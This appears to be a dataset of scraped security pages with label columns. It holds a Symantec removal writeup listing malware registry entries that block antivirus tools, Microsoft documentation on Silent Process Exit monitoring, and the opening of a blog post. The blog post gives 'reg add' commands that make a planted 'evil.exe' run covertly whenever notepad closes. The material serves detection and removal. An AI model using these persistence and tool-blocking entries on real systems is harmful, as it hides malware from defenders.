Options\\NPFMntor.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\vsstat.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KPfwSvc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Ras.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RavMonD.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mmsk.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\WoptiClean.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\QQKav.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\QQDoctor.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\EGHOST.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\360Safe.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\iparmo.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\adam.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\360rpt.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\360tray.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\AgentSvr.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\AppSvc32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\autoruns.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\avgrssvc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\AvMonitor.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\CCenter.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ccSvcHst.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\FileDsty.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\FTCleanerShell.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HijackThis.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Iparmor.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\isPwdSvc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\kabaload.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KaScrScn.SCR\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KASMain.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KASTask.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KAVDX.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KAVPFW.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KAVSetup.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KAVStart.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KISLnchr.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KMailMon.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KMFilter.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KPFW32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KPFW32X.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KPFWSvc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KRegEx.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KRepair.com\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KsLoader.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVCenter.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvDetect.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvfwMcl.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVMonXP.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVMonXP_1.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\kvol.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\kvolself.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvReport.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVScan.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVSrvXP.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVStub.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\kvupload.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\kvwsc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvXP.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvXP_1.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KWatch.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KWatch9x.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KWatchX.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\MagicSet.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mcconsol.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mmqczj.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KAV32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\nod32krn.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\PFWLiveUpdate.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\QHSET.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RavMonD.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RavStub.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RegClean.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwcfg.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RfwMain.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwsrv.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RsAgent.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Rsaupd.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\safelive.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\scan32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\shcfg32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\SmartUp.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\SREng.EXE\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\symlcsvc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\SysSafe.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\TrojanDetector.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Trojanwall.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\TrojDie.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UIHost.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxAgent.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxAttachment.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxCfg.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxFwHlp.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxPol.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UpLive.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\procexp.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwstub.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RegTool.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwProxy.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RawCopy.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\CCenter.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\filemon.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\regmon.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\AntiArp.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\GFUpd.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\GFRing3.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\QQDoctorMain.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\SelfUpdate.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Your Image File Name Here without a path\\""Debugger"" = ""ntsd -d"" Exit the Registry Editor. Note: If the risk creates or modifies registry subkeys or entries under HKEY_CURRENT_USER, it is possible that it created them for every user on the compromised computer. To ensure that all registry subkeys or entries are removed or restored, log on using each user account and check for any HKEY_CURRENT_USER items listed above. 5. To extract and restore Windows files The following documents provide general instructions on how to extract files. This information is provided for your convenience. The exact steps may vary slightly depending on the configuration of your operation system, the location of the files, and so on. For additional information, read the Help files, contact Microsoft, or refer to the following Windows documentation: The Microsoft Knowledge Base article: How to Extract Original Compressed Windows Files, Article ID Q129605, has detailed information for Windows 95/98/Me. How to extract files in Windows 98 and Windows Me. How to extract files using Windows 2000 or Windows NT 4.0. How to restore system files in Windows XP. Writeup By: Masaki Suenaga Information for Enterprise Business Partners Consumer (Norton) Our Offerings Products Products A-Z Services Solutions Buying Programs Connect with us Support Connect Communities Security Center Find a Partner Events Webcasts Contact Us About Symantec Blogs Customer Success Center Industry Accolades Newsroom Analyst Relations Careers Investor Relations Corporate Responsibility Privacy \xc3\xa2\xe2\x82\xac\xe2\x80\x9c GDPR Customer Assurance Portal Symantec Ventures CustomerOne Acquisitions Fireglass ID Analytics LifeLock Luminate Skycure \xc2\xa9 1995\xe2\x80\x932019 Symantec Corporation About Symantec Careers News Sitemap Legal Privacy Cookies Contact Us \xc3\xa2\xc5\x93\xe2\x80\xa2","0","0","0","1","1","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Monitoring Silent Process Exit - Windows drivers | Microsoft Docs Skip to main content Contents Exit focus mode Feedback Edit Share Twitter LinkedIn Facebook Email Theme Light Dark High contrast Sign in Profile Sign out Contents Monitoring Silent Process Exit 11/28/2017 5 minutes to read In this article Beginning with Windows\xc2 7, you can use the Silent Process Exit tab in GFlags to enter the name of a process that you want to monitor for silent exit. In the context of this monitoring feature, we use the term silent exit to mean that the monitored process terminates in one of the following ways. Self termination The monitored process terminates itself by calling ExitProcess. Cross-process termination A second process terminates the monitored process by calling TerminateProcess. The monitoring feature does not detect normal process termination that happens when the last thread of the process exits. The monitoring feature does not detect process termination that is initiated by kernel-mode code. To register a process for silent exit monitoring, open the Silent Process Exit tab in GFlags. Enter the process name as the Image and press the Tab key. Check the Enable Silent Process Exit Monitoring box, and click Apply. This sets the FLG_MONITOR_SILENT_PROCESS_EXIT flag in the following registry entry. HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ProcessName\\GlobalFlag For more information about this flag, see Enable silent process exit monitoring. For more information about using the Silent Process Exit tab in GFlags, see Configuring Silent Process Exit Monitoring. In the Silent Process Exit tab of GFlags, you can configure the actions that will take place when a monitored process exits silently. You can configure notification, event logging, and creation of dump files. You can specify a process that will be launched when silent exit is detected, and you can specify a list of modules that the monitor will ignore. Several of these settings are available both globally and for individual applications. Global settings apply to all processes that you register for silent exit monitoring. Application settings apply to an individual process and override global settings. Global settings are stored in the registry under the following key. HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit Application settings are stored in the registry under the following key. HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\ProcessName Reporting Mode The Reporting Mode setting is available as an application setting, but not as a global setting. You can use the following check boxes to set the reporting mode. Launch monitor process Enable dump collection Enable notification The ReportingMode registry entry is a bitwise OR of the following flags. Flag Value Meaning LAUNCH_MONITORPROCESS 0x1 When silent exit is detected, the monitor process (specified in the Monitor Process box) is launched. LOCAL_DUMP 0x2 When silent exit is detected, a dump file is created for the monitored process. In the case of cross-process termination, a dump file is also created for the process that caused the termination. NOTIFICATION 0x4 When silent exit is detected, a pop-up notification is displayed. Ignore Self Exits The Ignore Self Exits setting is available as an application setting, but not as a global setting. You can use the Ignore Self Exits check box to specify whether self exits are ignored. The IgnoreSelfExits registry entry has one of the following values. Value Meaning 0x0 Detect and respond to both self termination and cross-process termination. 0x1 Ignore self termination. Detect and respond to cross-process termination. Monitor Process You can specify a monitor process by entering a process name, along with command line parameters, in the Monitor Process text box. You can use the following variables in your command line. Varaible Meaning %e ID of the exiting process. This is the monitored process that exited silently. %i ID of the initiating process. In the case of self termination, this is the same as the exiting process. In the case of cross-process termination, this is the ID of the process that caused the termination. %t ID of the initiating thread. This is the thread that caused the termination. %c The status code passed to ExitThread or TerminateThread . For example, the following value for Monitor Process specifies that on silent exit, WinDbg is launched and attached to the exiting process. windbg -p %e The Monitor Process command line is stored in the MonitorProcess registry entry. Dump Folder Location You can use the Dump folder location text box to specify a location for the dump files that are written when a silent exit is detected. The string that you enter for Dump folder location is stored in the LocalDumpFolder registry entry. If you do not specify a dump folder location, dump files are written to the default location, which is %TEMP%\\Silent Process Exit. Dump Folder Size You can use the Dump folder size text box to specify the maximum number of dump files that can be written to the dump folder. Enter this value as a decimal integer. The value that you enter for Dump folder size is stored in the MaximumNumberOfDumpFiles registry entry. By default, there is no limit to the number of dump files that can be written. Dump Type You can use the Dump Type drop-down list to specify the type of dump file (Micro, Mini, Heap, or Custom) that is written when a silent exit is detected. The dump type is stored in the DumpType registry entry, which is a bitwise OR of the members of the MINIDUMP_TYPE enumeration. This enumeration is defined in dbghelp.h, which is included in the Debugging Tools for Windows package. For example, suppose you chose a dump type of Micro, and you see that the DumpType registry entry has a value of 0x88. The value 0x88 is a bitwise OR of the following two MINIDUMP_TYPE enumeration values. MiniDumpFilterModulePaths 0x00000080 MiniDumpFilterMemory 0x00000008 If you choose a dump type of Custom, enter your own bitwise OR of MINIDUMP_TYPE enumeration values in the Custom Dump Type box. Enter this value as a decimal integer. Module Ignore List You can use the Module Ignore List box to specify a list of modules that will be ignored when a silent exit is detected. If the monitored process is terminated by one of the modules in this list, the silent exit is ignored. The list of modules that you enter in the Module Ignore List box is stored in the ModuleIgnoreList registry entry. Reading Process Exit Reports in Event Viewer When a monitored process exits silently, the monitor creates an entry in Event Viewer. To open Event Viewer, enter the command eventvwr.msc. Navigate to Windows Logs > Application. Look for log entries that have a Source of Process Exit Monitor. Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. Feedback Send feedback about This product This page You may also leave feedback directly on GitHub . This page You may also leave feedback directly on GitHub . Liquid error: Can't find the localized string giveDocumentationFeedback for template Conceptual. Issue Title Leave a comment Submit feedback Loading feedback... There are no open issues There are no closed issues View on GitHub Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. In this article Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks","0","0","0","1","1","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Persistence using GlobalFlags in Image File Execution Options \xe2\x80\x93 Hidden from Autoruns.exe \xe2\x80\x93 Oddvar Moe's Blog Skip to content Menu Home About Presentations Articles AppLocker Case study AppLocker \xe2\x80\x93 Case study \xe2\x80\x93 Part 1 AppLocker \xe2\x80\x93 Case study \xe2\x80\x93 Part 2 AppLocker \xe2\x80\x93 Hardening \xe2\x80\x93 Part 1 AppLocker \xe2\x80\x93 Hardening \xe2\x80\x93 Part 2 AppLocker for admins \xe2\x80\x93 Does it work? Bypassing AppLocker as an admin AppLocker \xe2\x80\x93 Making sure that local rules are removed Real whitelisting attempt using AppLocker Ultimate AppLocker Bypass List Oddvar Moe's Blog Notes from My adventures with Windows security Persistence using GlobalFlags in Image File Execution Options \xe2\x80\x93 Hidden from\xc2 Autoruns.exe Posted on 10 Apr 201811 Apr 2018 by Oddvar Moe [MVP] TL;DR \xe2\x80\x93 Found a technique to execute any binary file after another application is closed without being detected by Autoruns.exe. \xe2\x80\x93 Requires administrator rights and does not belong in userland. \xe2\x80\x93 Can also be executed from alternate data streams \xe2\x80\x93 Plant file on disk and run these commands to create persistence that triggers everytime someone closes notepad.exe: reg add ""HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 reg add ""HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 reg add ""HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe"" /v MonitorProcess /d ""C:\\temp\\evil.exe"" \xc2 \xc2 Image File Execution Options Another day with some unstructered research time. I must admit that it feels good every time. \xf0\x9f\x99\x82 Last time I found a way to execute DLL files and still hide from Autoruns.exe.\xc2 This time I found some interesting stuff, that I have not found that much related information on and hopefully it will help people detect someone if they are using this technique. This adventure started out when I was looking for other ways to execute data from alternate streams. Somehow I ended up in Process monitor (big surprise) and started looking at the Image File Execution Options. Normally I would just pass by these, since I always assume that someone has probably already discovered all there is to discover. Again it turns out that assumptions is the mother of all fu**ups. I started by Googling for information about the Image File Execution Options and especially the\xc2 ApplicationGoo setting and I ended up here:\xc2 https://blogs.msdn.microsoft.com/junfeng/2004/04/28/image-file-execution-options/ This blogpost also mentioned GlobalFlags and that cought my eye. After I was done Googling and searching for ApplicationGoo and what it did, I stumbled upon this and it turned out that you can add the ApplicationGoo in a special way to fake what 